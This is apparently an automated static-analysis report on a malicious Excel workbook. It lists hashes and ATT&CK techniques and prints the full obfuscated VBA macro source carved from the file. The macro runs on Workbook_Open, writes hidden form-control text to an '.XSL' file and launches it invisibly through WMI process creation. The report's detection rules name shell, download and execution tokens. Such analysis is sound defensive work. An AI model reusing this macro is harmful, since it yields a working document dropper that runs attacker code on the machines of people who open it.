Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 4dc9b2f11546e5bf…

MALICIOUS

Office (OOXML) / .XLSX

Size: 180.2 KB | Created: 2021-03-22 13:13:56 UTC | Authoring application: Microsoft Excel 15.0300 | First seen: 2022-07-13
MD5: b876d6897e25db661b02a79c2e68eb0d
SHA-1: f7743ba186492f6cb788837ec510a79999ef951c
SHA-256: 4dc9b2f11546e5bf8fb9901809a0707ff1e23acdc52742b991ddff18ce03733c
Risk Score: 108

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

This OOXML file contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The presence of GetObject calls and p-code execution further indicates malicious intent. The script is heavily obfuscated and truncated, preventing a detailed analysis of its exact function, but it is designed to execute arbitrary code.

Heuristics (4)

  • VBA project inside OOXML (severity: medium; 3 related findings; rule ID: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • GetObject call (severity: high; rule ID: OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script:
    Set qfCIaggyzG = GetObject(J_NV_wWU.kQXjmT_gw).SpawnInstance_
  • VBA p-code auto-exec with execution tokens (severity: high; rule ID: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule ID: OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script:
    Private Sub Workbook_Open()

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8575 bytes
SHA-256: 2516eb3709b42eba0eec3a1962f5173fddc13988d04cb7500d5cc248d8b0bbc5
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
IsMissing (ZSzZSIVceT7B)
jRubCR4_muEbAK = IsEmpty("lA9SMl")
JGsM85 = IsArray(IsDate(pprdoi))
Fkgs_WthepD_kh_Si_AtinenmqE_PU.ezQlfyR_GOAwuDO
HdUNA7 = IsDate(olpueG)
IsDate (IsMissing(vt4vFy_MXfqiS))
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "EyGhjx_VnzYGAULd_rychbrqWFV"
Attribute VB_Base = "0{BA39A57F-8E87-43C5-B3E3-39B63B5A509F}{C3CFE1E5-3EDC-4CE2-A82E-C118359F64B6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Id_dQVdw()
IsMissing (IsObject(c095VuY))
k65d4SaX16TER = IsDate(IsError(HwhTqgJ))
IsEmpty (IsArray("D46ZiIk"))
Id_dQVdw = Range("CZ104")
Do0nCcAzAtnJ = IsMissing("kyR2u9")
Sk6bTAq_byyhxQ = IsDate(JI2k3l_MF9Gk)
hDslBU_d60jy = IsNumeric(UYyLrc)
End Function
Function mUfXCDOp()
IsNull ("EmfdLzL")
oWo3Dl0nePuu = IsDate("M3Lq0MsO0Ge4")
oU_ZYnLgC_QAMLIQT_zMHYIMBz_qXVm = Chr(CLng((0.335294117647059 * (671 + -331#))))
IsArray (VbWDrbAqbVp)
IsError ("TAfz6Cr")
oj2Pru = IsObject("yt2zi3")
IsMissing (IsArray("XGJl8p5_pdxPA"))
PELVOo = IsError("JKEafV")
I8v4xARe0X4J = IsMissing(TsdJAe9g5gxQn)
mUfXCDOp = Join(Array(J_NV_wWU.eqfuPUpBzAPCpBod & ChrW(CLng((xlRadarFilled And ((3.23008849557522 * xlDialogFormatOverlay) - 606#)))) & oU_ZYnLgC_QAMLIQT_zMHYIMBz_qXVm & Chr(CLng(((-2.79893791653113E-04 * (1084 + -273#)) * -489))) & ChrW(CLng(((-1.13005958495993E-03 * 942) * (-0.293375394321767 * 317)))) _
  & ChrW(101) & ChrW(CLng(((-0.174242424242424 * -660) And xlDialogRowHeight))) _
  & Chr(115) _
 ))
BmlAj3_Q70uZ = IsArray("Xbm326X_SJfG5G")
kc5Vgo_lYqMfs = IsEmpty(CTGkr8_yL7Bj)
IsError (IsMissing("DqUbfe2_zy0Kp"))
End Function


Attribute VB_Name = "rE__YPVUnvXtolwXBknCzaPN"
Attribute VB_Base = "0{DA58EC91-0C87-41B0-9EE3-A9F38253B99B}{1A70D71E-36D8-4569-8B9B-57457A4C50AF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function EKbwEERCqorpziPATe_c__uPP()

IsDate (IsNumeric(VqPLc0G_SCn3Ja))

IsEmpty (IsObject("WoE7mk2HyUWj6"))

IsNumeric (IsEmpty(JEdRzG0ZY0c))

SRHCqiE_NiLRul = IsDate(Y9hew9Z)

ZaGS3Th = IsNull("e15f2dF")

UTHgzW_YoxzaN_J__mvE_fPmuF = Replace("5@Ol*20.XSL5@Ol*5@Ol*", "5@Ol*", "")
GacUVfOQlCPEf__GPwPMFrzZqpe = EyGhjx_VnzYGAULd_rychbrqWFV.Id_dQVdw
IsNumeric ("riJjhP")
QAXzbA = IsNumeric(IsError(P1tA5k))
GyD0tH = IsArray(IsDate("uwFly3"))
IsObject (IsMissing(W3Be6fPNYXgx))
zsRjaKL = IsObject(IsEmpty(he22MS))
EKbwEERCqorpziPATe_c__uPP = Join(Array(GacUVfOQlCPEf__GPwPMFrzZqpe + UTHgzW_YoxzaN_J__mvE_fPmuF))

IsError (IsMissing("D4c1MO"))

IsDate (IsNumeric(AyuqlC))

bcQexR = IsDate(IsObject("CKDJJH"))

End Function

Attribute VB_Name = "hLYnl_VEzm"
Attribute VB_Base = "0{1B321AE1-8B2C-437E-9C17-C448F59E0F55}{79A4E4DD-4237-423C-9E2B-2077E4BECF6F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function bQgElzgrEis()
JEZXVT = IsError(bE68ZB)
IsObject (jejoUH)
IsError (U0CwcF)
bQgElzgrEis = Range("DE63")
IsNumeric ("wAeYa8D")
IsMissing (IsMissing(SnYCUKVDDlvY))
IsDate ("ZIniTb")
End Function

Attribute VB_Name = "J_NV_wWU"
Function kQXjmT_gw()

WmztT0 = IsNull(IsDate("Wzj7LvM_PrKq3K"))

DnpkD0v = IsObject(IsArray("DmtAV5"))

UtHJxEb0RHMz = IsMissing(IsDate("tX1QgH4Fc0Ia"))

IsNull (IsObject(sHnRgq))

IsDate (IsDate(BZ5vbg_ph53I))

IsDate (IsError(ACOCZ0O))
IsEmpty ("XzNtnki6iFxOV")
IsError ("TLgY69tF1W6M")
UuLlTvQkSQyTQylnLbna = hLYnl_VEzm.bQgElzgrEis
MPpNdOHH0U64y = IsEmpty(IsNumeric(IOHZ2NPHHFo8S))
kQXjmT_gw = Join(Array(UuLlTvQkSQyTQylnLbna + Range("FY169")))

LDVWmKmOd7XcD = IsNumeric(IsDate(TdsWDm1fZPA))

DXZVFb_3b5fl = IsMissing(BVcSN02)

IsNull (IsEmpty(ZLV58eM))

End Function

Function eqfuPUpBzAPCpBod()

oUeucQ_3RDecu = IsEmpty(IsNumeric(OUeCSeR))

eqfuPUpBzAPCpBod = Range("GB226")

IsMissing ("yCWYpR0_Autd26")

qL6CqxWer4AT = IsNull("JG9jH0u_oQXS1")

End Function

Attribute VB_Name = "maxlXCEcw_qE"
Attribute VB_Base = "0{E6B46392-F142-4627-91BF-A87AB5339CE0}{0E5B6E98-8AD3-4A83-BD22-E955AB4AAD74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function qfCIaggyzG()
IsMissing (IZK9Urf)
IsMissing (HLSlNO_url0F)
IsDate ("ByqxLuG_Id6GT3")
Set qfCIaggyzG = GetObject(J_NV_wWU.kQXjmT_gw).SpawnInstance_
IsDate (IsObject(EkpXiG_CvcHCE))
a8ZF9I = IsArray(IsNumeric("gPk5X0BPR4NmN"))
IsObject (IsMissing(DuoQuC4_3vJ8ir))
With qfCIaggyzG
.ShowWindow = CLng((-2.27703984819734E-02 * -527))
End With
IsDate (IsDate("fVzUadJ9FFa"))
IsEmpty ("W4RcKL")
IsNull ("wvop8t_fgXaa")
End Function
Function OJPXZaOwwk__YOT_n()
IpF2Zlr = IsArray(IsNull("KxeCPa"))
WMT2j8hGAu9 = IsArray(IsArray(BRYTKZw))
IsError (P08eWlD_sw7Oa)
IsNumeric (IsNumeric("Gx0Im6VeICZJ"))
OiUK_iCY = LiRpBHOwmUrrjAmH.fz_i_smhXSKu_STbmNgsDtYB
IsError (IsObject(ALKDVyD))
PiWEzpOZjsGR = IsEmpty(IsDate("MCGMdAJ"))
IsObject ("GWPgRRe")
OJPXZaOwwk__YOT_n = Join(Array(OiUK_iCY))
FErZCGz = IsError("aEF6Q3EYyjA0")
IsMissing (IsDate("E1BvBCF_2Jbtug"))
PHPasJyFYzUe = IsObject("ejzl8y")
End Function

Attribute VB_Name = "LiRpBHOwmUrrjAmH"
Attribute VB_Base = "0{A8C5EBB7-FD7C-4F62-AAE1-8E9B45753931}{519865BF-4B99-4716-BA85-05D68B998CBC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function fz_i_smhXSKu_STbmNgsDtYB()

IsNumeric ("hZE3GPU_FwKeW")

IsNull (IsEmpty(MeG9kJ))

Oig77tj0ymtT = IsMissing(IsArray("y6hinR1EAaenY"))

fz_i_smhXSKu_STbmNgsDtYB = Range("BL179")

NAHV41t = IsObject(IsArray("QAl9LK"))

UxUOOQ0DPum = IsMissing("Ss9qMx")

Ja6BhCE = IsArray(IsArray("Ti6PGwa"))

End Function

Attribute VB_Name = "Fkgs_WthepD_kh_Si_AtinenmqE_PU"
Attribute VB_Base = "0{A66BEE4C-9CF1-40DE-8734-9AA164E7EE64}{F19D0CA3-6DCF-4BA7-9BB2-8A473778AE74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ezQlfyR_GOAwuDO()
Dim aldmVV_cFZZN_QYbGPehxTbavt As String
IsError (IsDate("vhRbIB"))
FojFdk3 = IsNull(Rwk92g_GnHCXz)
aldmVV_cFZZN_QYbGPehxTbavt = Replace(LiRpBHOwmUrrjAmH.ZdoQoGhW_GXcJkBrojFUU.Text, "kYiEp@K=x)ti xUK", "")
IsError (IsDate(Qpiaiw_ojZqu))
IsNumeric (IsObject(mbvWBPD_idN05W))
IsObject ("PYdusNg")
Open Application.ActiveWorkbook.Path & rE__YPVUnvXtolwXBknCzaPN.EKbwEERCqorpziPATe_c__uPP For Binary As #CLng((xlTabPositionFirst Xor xlPrimary))
FJWhYfA = IsEmpty(foSen5m)
IsError (IsError("Qd3ERun"))
Put #CLng((xlAnd Or xlSolid)), , aldmVV_cFZZN_QYbGPehxTbavt
bOtvA1 = IsObject(cI8RGZj_HcjwJ8)
IsDate ("xWHHkpc")
Close #CLng((xlArrangeStyleTiled Or xlIMEModeNoControl))
E81EIo_bNaQl1 = IsNumeric(UO0FIV_8wfLr)
IsEmpty (eCAgLEGKxRZ3)
PPhwm_T_UGdUV
WC2097H = IsDate(IsNumeric(KNuIl3Z))
Y4790m = IsDate(IsDate(wAmBQCU))
End Function
Function PPhwm_T_UGdUV()
FHYuZO_yO4udH = IsArray(IsError("L0H41t9_ihd0FW"))
IsNull (IsArray("IiGtT3r_bsNUU"))
IsArray (IsError("lQUKJw"))
With GetObject(EyGhjx_VnzYGAULd_rychbrqWFV.mUfXCDOp)
.Create maxlXCEcw_qE.OJPXZaOwwk__YOT_n & Chr(34) & Application.ActiveWorkbook.Path & rE__YPVUnvXtolwXBknCzaPN.EKbwEERCqorpziPATe_c__uPP & Chr(34), Null, maxlXCEcw_qE.qfCIaggyzG
End With
IsNull ("XYGlyx")
IsArray ("BhNcja")
GgvolmA = IsObject("T5QpFm_gYAGo")
PqsuBjK = IsDate("XZdSF6_0qwIVw")
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 67072 bytes
SHA-256: 50deef26d1e65b0aadf094b2805a2120e30444858495be0f453f6783c34b56a8